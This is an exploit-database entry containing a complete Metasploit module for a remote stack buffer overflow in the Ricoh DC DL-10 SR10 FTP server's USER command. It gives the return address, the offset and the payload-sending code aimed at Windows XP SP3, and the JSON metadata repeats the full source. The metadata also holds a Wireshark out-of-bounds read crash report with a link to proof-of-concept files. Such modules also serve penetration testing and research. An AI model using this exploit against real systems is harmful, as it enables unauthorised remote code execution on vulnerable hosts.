Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
2012-03-24T00:00:00
ID 1337DAY-ID-17818 Type zdt Reporter metasploit Modified 2012-03-24T00:00:00
Description
Exploit for windows platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info={})
super(update_info(info,
'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
service. By supplying a long string of data to the USER command, it is
possible to trigger a stack-based buffer overflow, which allows remote code
execution under the context of the user.
Please note that in order to trigger the vulnerability, the server must
be configured with a log file name (by default, it's disabled).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julien Ahrens', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '79691'],
['URL', 'http://secunia.com/advisories/47912'],
['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
],
'Payload' =>
{
# Yup, no badchars
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3',
{
'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)
'Offset' => 245
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 1 2012",
'DefaultTarget' => 0))
# We're triggering the bug via the USER command, no point to have user/pass
# as configurable options.
deregister_options('FTPPASS', 'FTPUSER')
end
def check
connect
disconnect
if banner =~ /220 DSC ftpd 1\.0 FTP Server/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
buf = ''
buf << rand_text_alpha(target['Offset'], payload_badchars)
buf << [target.ret].pack('V')
buf << make_nops(20)
buf << payload.encoded
print_status("#{rhost}:#{rport} - Sending #{self.name}")
connect
send_user(buf)
handler
disconnect
end
end
=begin
0:002> lmv m SR10
start end module name
00400000 00410000 SR10 (deferred)
Image path: C:\Program Files\DC Software\SR10.exe
Image name: SR10.exe
Timestamp: Mon May 19 23:55:32 2008 (483275E4)
CheckSum: 00000000
ImageSize: 00010000
File version: 1.0.0.520
Product version: 1.0.0.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Ricoh Co.,Ltd.
ProductName: SR-10
InternalName: SR-10
OriginalFilename: SR10.EXE
ProductVersion: 1, 0, 0, 0
FileVersion: 1, 0, 0, 520
PrivateBuild: 1, 0, 0, 520
SpecialBuild: 1, 0, 0, 520
FileDescription: SR-10
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=end
# 0day.today [2018-01-01] #
{"hash": "1acf86ed09cbd14d1d54bbb1beb7bfeb180bda0c07cc877cb58a5c7a750ea085", "id": "1337DAY-ID-17818", "lastseen": "2018-01-01T07:16:57", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "b39579db2d6de8b5f64942a4764ae1cb", "key": "href"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "modified"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "c37e55f33a26de32e99af36d1dbb8037", "key": "sourceData"}, {"hash": "d6e11916cf3fc1edf6bfcb811763e890", "key": "sourceHref"}, {"hash": "1cc6ef820a161a28829dfd22169c3074", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-26008"]}], "modified": "2018-01-01T07:16:57"}, "vulnersScore": 6.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17818", "description": "Exploit for windows platform in category remote exploits", "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "history": [{"bulletin": {"hash": "f94d8751113f8e3706a4b34db497df246b972b41583db023e9f437efc7a1951b", "id": "1337DAY-ID-17818", "lastseen": "2016-04-20T01:45:25", "enchantments": {"score": {"value": 4.6, "modified": "2016-04-20T01:45:25"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "modified"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1cc6ef820a161a28829dfd22169c3074", "key": "title"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1b3ec8034147f60c74d561db76ae56b3", "key": "sourceHref"}, {"hash": "b5e92171ba1fd0a440ed1681fa277c5f", "key": "sourceData"}, {"hash": "cccd9ed5147b62b70585f5e816828b30", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17818", "description": "Exploit for windows platform in category remote exploits", "viewCount": 0, "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-03-24T00:00:00", "references": [], "reporter": "metasploit", "modified": "2012-03-24T00:00:00", "href": "http://0day.today/exploit/description/17818"}, "lastseen": "2016-04-20T01:45:25", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2012-03-24T00:00:00", "references": [], "reporter": "metasploit", "modified": "2012-03-24T00:00:00", "href": "https://0day.today/exploit/description/17818"}
{"zdt": [{"lastseen": "2018-04-13T07:50:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-05-13T00:00:00", "published": "2016-05-13T00:00:00", "href": "https://0day.today/exploit/description/26008", "id": "1337DAY-ID-26008", "type": "zdt", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/26008", "cvss": {"score": 0.0, "vector": "NONE"}}]}
